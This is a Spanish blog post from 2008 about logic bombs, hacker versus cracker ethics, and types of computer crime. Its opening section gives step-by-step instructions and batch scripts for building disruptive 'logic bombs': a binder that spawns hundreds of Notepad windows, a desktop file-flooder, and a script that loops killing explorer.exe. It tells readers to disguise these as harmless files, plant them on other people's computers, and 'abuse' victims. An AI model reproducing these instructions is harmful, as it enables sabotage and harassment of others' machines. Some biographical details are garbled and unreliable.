lunes, 14 de julio de 2008

Bombas lógicas

Es un programa informático que se instala en un ordenador y permanece oculto hasta cumplirse una o más condiciones pre programadas para entonces ejecutar una acción. A diferencia de un virus, una bomba lógica jamás se reproduce por sí sola.
Este suele ser el procedimiento de sabotaje mas comúnmente utilizado por empleados descontentos. Consiste en introducir un programa o rutina que en una fecha determinada destruirá, modificara la información o provocara el cuelgue del sistema.
Se activan en determinadas circunstancias cuando la computadora infectada cumple una serie de requisitos especificados por su programador.

Ejemplos de condiciones predeterminadas:
Día de la semana concreto.
Hora concreta.
Pulsación de una tecla o una secuencia de teclas concreta.
Levantamiento de un interfaz de red concreto.
Ejecución de un archivo concreto.
Ejemplos de acciones:
Borrar la información del disco duro.
Mostrar un mensaje.
Reproducir una canción.
Enviar un correo electrónico.
No existen usos legales de las bombas de tiempo o de bombas lógicas solo usos ilegales como dañar computadoras de otros.
Ejemplos de Bombas Lógicas
Ejemplo número uno:
Bueno, no es necesario saber nada para poder hacer tu propia bombalógica y colapsar la pc de cualquiera, es fácil de hacer y la gente esfácil de engañar.
Primero que nada nos bajamos mi blinder de acá DOWNLOAD Blinder->http://rapidshare.com/files/28926690/blinder.rar.html
Dejamos el blinder guardadito que luego lo utilizaremos.
PASO 1
Creamos un archivo de texto con lo que queramos dentro (en mi caso le puse mi dirección de MSN o también mi firma).
Lo guardamos con el nombre que nos plazca en una carpeta vacía.
PASO 2
Hacemos todas las copias que podamos de ese archivo de texto, copiándolo una yotra vez en la misma carpeta hasta que tengamos 1500 aproximadamente,ahora no recuerdo bien el tope que nos permite Windows para llenar dearchivos una carpeta.
PASO 3
Abrimos el blinder. Seleccionamos todos esos archivos de texto y los arrastramos hasta la ventana del blinder
PASO 4
Cambiamos el ícono por otro que veamos que sirve para engañar a la víctima y lo tiente a ejecutar nuestra bomba
PASO 5
Guardamos nuestra bomba con el botón "Juntar" con el nombre que queramos (que se relacione con el ícono) y se la pasamos a algún amigo, o la dejamos suelta en el escritorio de alguna PC del colegio, cyber, casa de amigoo familia, trabajo, etc, etc...
De ésta simple manera pueden hacerse una BOMBA que al ejecutar la víctima explote en infinidad de block de notas con el texto que ustedes escribieron....
ABUSEN y hagan muchas maldades...

Ejemplo número dos:
Aquí un ejemplo de un código de una pequeña broma:
@echo off
cd %homepath%\Escritorio
echo off>>loco.txt
echo off>>pelele.exe
echo off>>gamoko.jpeg
echo off>>guarrilla.jpeg
echo off>>virus.txt
echo off>>loud.bat
echo off>>tocar.vbs
echo off>>gilipollas.txt
msg * Te he llenado de archivos el escritorioexit----------------------------------------------
Ese pequeño código lo que haría, es que al ser ejecutado crearía los archivos "loco.txt" "pelele.exe" "gamoko.jpeg" "guarrilla.jpeg" "virus.txt" "load.bat" "tocar.vbs" y "gilipollas.txt" en el escritorio y luego le saldría una ventana con el mensaje "te he llenado de archivos el escritorio".
Evidentemente este archivo no es más que una broma que no hace daño, pero se puede hacer mucho más dañina añadiéndola al registro etc.
Existen bombas lógicas especialmente crueles, algunas actúan como virus informáticos que se activan en una fecha señalada como el día de aniversario de la victima inutilizando su ordenador para esa fecha. Algunos ciberdelincuentes han hecho un uso muy creativo de estas bombas del tiempo por ejemplo, esperar a que el usuario abra una foto o archivo en concreto para ejecutarlas programando la destrucción de archivos e informaciones justo cuanto el usuario teclee un nombre o palabra determinada en su procesador de textos. Algunos de estos programas entran en forma de virus, el Chernobyl, por ejemplo, espera hasta el 26 de abril de cada año, es al llegar esa fecha cuando se dispersa en el disco duro y empieza a infectar todo el ordenador hasta inutilizarlo por completo.
Tip: si se lo enviaran a una victima pónganle un nombre menos llamativo y Listo Tienen su Bomba Lógica
Ejemplo número tres:
INICIA_______
@echo off set /p hacer= Que quieres hacer? 1.Un virus, 2.Escalar privilegios (escoge un numero)if %hacer%==1 goto virus
if %hacer%==2 goto privi
:privi
set /p hora= Di la hora en la que esta el pc +3mins.
at %hora% /ineractive cmd.exe
goto alahora
:alahora
tskkill /f /im explorer.exe
start explorer.exe
goto exit
:virus
echo El propietario del pc la va a cagar XD
start cmd.exe
start www.minijuegos .com
start www.foro.porta lhacker.net
taskkill /f /im explorer.exe
goto virus
_____________TERMINA___________---

Para los que no saben como hacer una bomba lógica aquí les va:
1. Copian el código.
2. Abren el bloc de notas
3. Pegan el código
4. Le dan en guardar como
5. Escogen un nombre y al final le ponen .bat
Ejemplo: Bombalogica.bat
Tip: si se lo enviaran a una victima pónganle un nombre menos llamativo y Listo Tienen su Bomba Lógica

DIFERENCIAS ENTRE HACKERS Y CRACKERS

El hacker, no puede ser considerado antiético por el hecho de que tiene su propia ética, hay que ver si esta ética coincide con la de las demás personas que tienen un pensamiento muy distinto al de los hackers, que buscan la verdad y no el conformismo como el resto de las personas.
El hacker nunca está conforme, no puede pensar en un mundo con limitaciones, le apasiona investigar, no se queda callado, no soporta los abusos de los gobiernos, la limitación de la información, de la tecnología, etc.
¿Pero qué es lo que hace el verdadero hacker?, el hacker lucha por una red libre, que no tenga dueños, que todos tengan acceso a la información, pero que la información clasificada esté bien protegida. En este sentido el hacker, le hace un favor a la sociedad violando sistemas informáticos porque si lo hiciese un espía o enemigo podría causar graves perjuicios.
Muchas veces, la gente confunde a los hackers con los crackers. Parece que el termino hacker fuese una ambigüedad, pero se equivocan, es como confundir al ladrón con el policía.
El cracker tiene como intención destruir, el hacker todo lo contrario.
El cracker comete fraudes con tarjetas de crédito, el hacker no. Ahora la pregunta es como se manifiesta el hacker?. A lo sumo el hacker puede violar algún servidor, o una página web, lo que hace es dejar constancia de que ese sitio es vulnerable, para que el dueño modifique la seguridad del mismo. ¿ Para qué?, muy fácil, por ejemplo, yo tengo una empresa que vende productos, esos productos pueden ser adquiridos vía web con el uso de una tarjeta de crédito, supongamos que entra un cracker y se roba los números de tarjetas de todas las personas que han comprado en ese sitio, ¿quién es la victima?, La respuesta es obvia, la pobre persona que deposito su confianza en ese site, y el cracker goza felizmente la valiosa información que encontró en ese sitio, y piensa en cuanto puede vender esos números, y si usted fuese el hacker que impide que pase eso, y al otro día lee los diarios, y ve que lo acusan de ladrón ¿cómo se sentiría?

CRACKERS


Es alguien que viola la seguridad de un sistema informático de forma similar a como lo haría un hacker, sólo que a diferencia de este último, el cracker realiza la intrusión con fines de beneficio personal o para hacer daño.
Crackers famosos
Fred Cohen.
Al presentar su tesis doctoral sobre Ingeniería Eléctrica en la Universidad del Sur de California, demostró cómo se podían crear virus, motivo por el cual es considerado como el primer autor de virus "autodeclarado" .
Robert Tappan Morris. Fue uno de los precursores de los virus informáticos.
Kevin David Mitnick desde muy niño sintió curiosidad por los sistemas de comunicación electrónica y fue cultivando un obsesivo deseo por investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para ingresar en servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc.
Chen Ing. Hau. Fue el creador del virus CIH, que lleva sus propias iniciales, motivo que justificó por una venganza en contra de los que llamó "incompetentes desarrolladores de software antivirus".
Vladimir Harkonen. otros alias: H4rK0n3N y Cibereye, este joven español se especializó en diferentes disciplinas como lurker, phreaker, hacker y cracker. Se le atribuyen ataques en los últimos 5 años a diferentes empresas como Sony.

El perfil de un delincuente informático

Estadísticas demuestran que las personas que cometen delitos informáticos poseen generalmente las siguientes características:
- En general son personas que no poseen antecedentes delictivos.- La mayoría de sexo masculino.
- Actúan en forma individual.
- Poseen una inteligencia brillante y alta capacidad lógica, ávidas de vencer obstáculos; actitud casi deportiva en vulnerar la seguridad de los sistemas, características que suelen ser comunes en aquellas personas que genéricamente se las difunde con la denominación "hackers".
- Son jóvenes con gran solvencia en el manejo de la computadora, con coraje, temeridad y una gran confianza en sí mismo.
- También hay técnicos no universitarios, autodidactas, competitivos, con gran capacidad de concentración y perseverancia. No se trata de delincuentes profesionales típicos, y por eso, son socialmente aceptados.
- Dentro de las organizaciones, las personas que cometen fraude han sido destacadas en su ámbito laboral como muy trabajadoras y motivadas.

TIPOS DE DELITOS INFORMÁTICOS

MANIPULACIÓN DE COMPUTADORAS
Manipulación de los datos de entrada
Este tipo de fraude informático conocido también como sustracción de datos, representa el delito informático más común ya que es fácil de cometer y difícil de descubrir. Este delito no requiere de conocimientos técnicos de informática y puede realizarlo cualquier persona que tenga acceso a las funciones normales de procesamiento de datos en la fase de adquisición de los mismos.
Manipulación de programas
Es muy difícil de descubrir y a menudo pasa inadvertida debido a que el delincuente debe tener conocimientos técnicos concretos de informática. Este delito consiste en modificar los programas existentes en el sistema de computadoras o en insertar nuevos programas o nuevas rutinas. Un método común utilizado por las personas que tienen conocimientos especializados en programación informática es el denominado “Caballo de Troya”, que consiste en insertar instrucciones de computadora de forma encubierta en un programa informático para que pueda realizar una función no autorizada al mismo tiempo que su función normal.
Manipulación de los datos de salida
Se efectúa fijando un objetivo al funcionamiento del sistema informático. El ejemplo más común es el fraude de que se hace objeto a los cajeros automáticos mediante la falsificación de instrucciones para la computadora en la fase de adquisición de datos. Tradicionalmente estos fraudes se hacían con base en tarjetas bancarias robadas, sin embargo, en la actualidad se usan ampliamente equipos y programas de computadora especializados para codificar información electrónica falsificada en las bandas magnéticas de las tarjetas bancarias y de las tarjetas de crédito.
Fraude efectuado por manipulación informática que aprovecha las repeticiones automáticas de los procesos de cómputo
Es una técnica especializada que se denomina "técnica del salchichón o salami" en la que "rodajas muy finas" apenas perceptibles, de transacciones financieras, se van sacando repetidamente de una cuenta y se transfieren a otra.
Daños o modificaciones de programas o datos computarizados
Sabotaje informático
Es el acto de borrar, suprimir o modificar sin autorización funciones o datos de computadora con intención de obstaculizar el funcionamiento normal del sistema.
Las técnicas más comunes que permiten cometer sabotajes informáticos son:
- Virus: es una serie de claves programáticas que pueden adherirse a los programas legítimos y propagarse a otros programas informáticos. Un virus puede ingresar en un sistema por conducto de una pieza legítima de soporte lógico que ha quedado infectada.
- Gusanos: se fabrica de forma análoga al virus con miras a infiltrarlo en programas legítimos de procesamiento de datos o para modificar o destruir los datos, pero es diferente del virus porque no puede regenerarse.
- Bomba lógica o cronológica: exige conocimientos especializados ya que requiere la programación de la destrucción o modificación de datos en un momento dado del futuro, ya que se activa según una condición. Ahora bien, al contrario de los virus o los gusanos, las bombas lógicas son difíciles de detectar antes de que exploten; por eso, de todos los dispositivos informáticos criminales, las bombas lógicas son las que poseen el máximo potencial de daño.
Accesos no autorizados a servicios y sistemas informáticos
- Piratas informáticos o hackers
El acceso se efectúa a menudo desde un lugar exterior, situado en la red de telecomunicaciones, recurriendo a uno de los diversos medios que se mencionan a continuación: el delincuente puede aprovechar la falta de rigor de las medidas de seguridad para obtener acceso o puede descubrir deficiencias en las medidas vigentes de seguridad o en los procedimientos del sistema. A menudo, los piratas informáticos se hacen pasar por usuarios legítimos del sistema; esto suele suceder con frecuencia en los sistemas en los que los usuarios pueden emplear contraseñas comunes o contraseñas de mantenimiento o que vienen por defecto, que están en el propio sistema.
- Reproducción no autorizada de programas informáticos
Esta puede entrañar una pérdida económica sustancial para los propietarios legítimos. Algunas jurisdicciones han tipificado como “delito” esta clase de actividad y la han sometido a sanciones penales. El problema ha alcanzado dimensiones transnacionales con el tráfico de esas reproducciones no autorizadas a través de las redes de telecomunicaciones modernas.

CARACTERÍSTICAS DE LOS DELITOS INFORMÁTICOS

  • Son conductas criminógenas de cuello blanco (white collar crimes), en tanto que sólo determinado número de personas con ciertos conocimientos (en este caso técnicos) pueden llegar a cometerlas.
  • Son acciones ocupacionales, en cuanto que muchas veces se realizan cuando el sujeto se halla trabajando.
  • Son acciones de oportunidad, en cuanto que se aprovecha una ocasión creada o altamente intensificada en el mundo de funciones y organizaciones del sistema tecnológico y económico.
  • Provocan serias pérdidas económicas, ya que casi siempre producen "beneficios de más de cinco cifras a aquellos que los realizan.
  • Ofrecen facilidades de tiempo y espacio, ya que en milésimas de segundo y sin una necesaria presencia física pueden llegar a consumarse.
  • Son muchos los casos y pocas las denuncias, y todo ello debido a la misma falta de regulación por parte del Derecho.
  • Son muy sofisticados y relativamente frecuentes en el ámbito militar.
  • Presentan grandes dificultades para su comprobación, esto por su mismo carácter técnico.
  • En su mayoría son imprudenciales y no necesariamente se cometen con intención.
  • Ofrecen facilidades para su comisión a los mentores de edad.
  • Tienden a proliferar cada vez más, por lo que requieren una urgente regulación.
  • Por el momento siguen siendo ilícitos impunes de manera manifiesta ante la ley.

HACKER

Hacker

Es el neologismo utilizado para referirse a un experto en varias o alguna rama técnica relacionada con la informática: programación, redes de computadoras, sistemas operativos, hardware de red/voz, etc. Se suele llamar hackeo y hackear a las obras propias de un hacker.


Hackers Famosos

Richard Stallman. Programador y la figura más relevante del movimiento por el software libre. En 1971, siendo estudiante de primer año de Física en la Universidad Harvard, Stallman se convirtió en un hacker del laboratorio de inteligencia artificial (IA) del MIT.
Ken Thompson. Es un pionero en las ciencias de la computación. Su trabajo con el lenguaje de programación B y el sistema operativo UNIX y Plan 9 para los laboratorios Bell. Se le adjudica a Thompson, junto a Dennis Ritchie, la creación de UNIX.
Eric S. Raymond
Adrian amo.Es un ex grey hat hacker y periodista, conocido principalmente por irrumpir en redes de alta seguridad de las redes informáticas.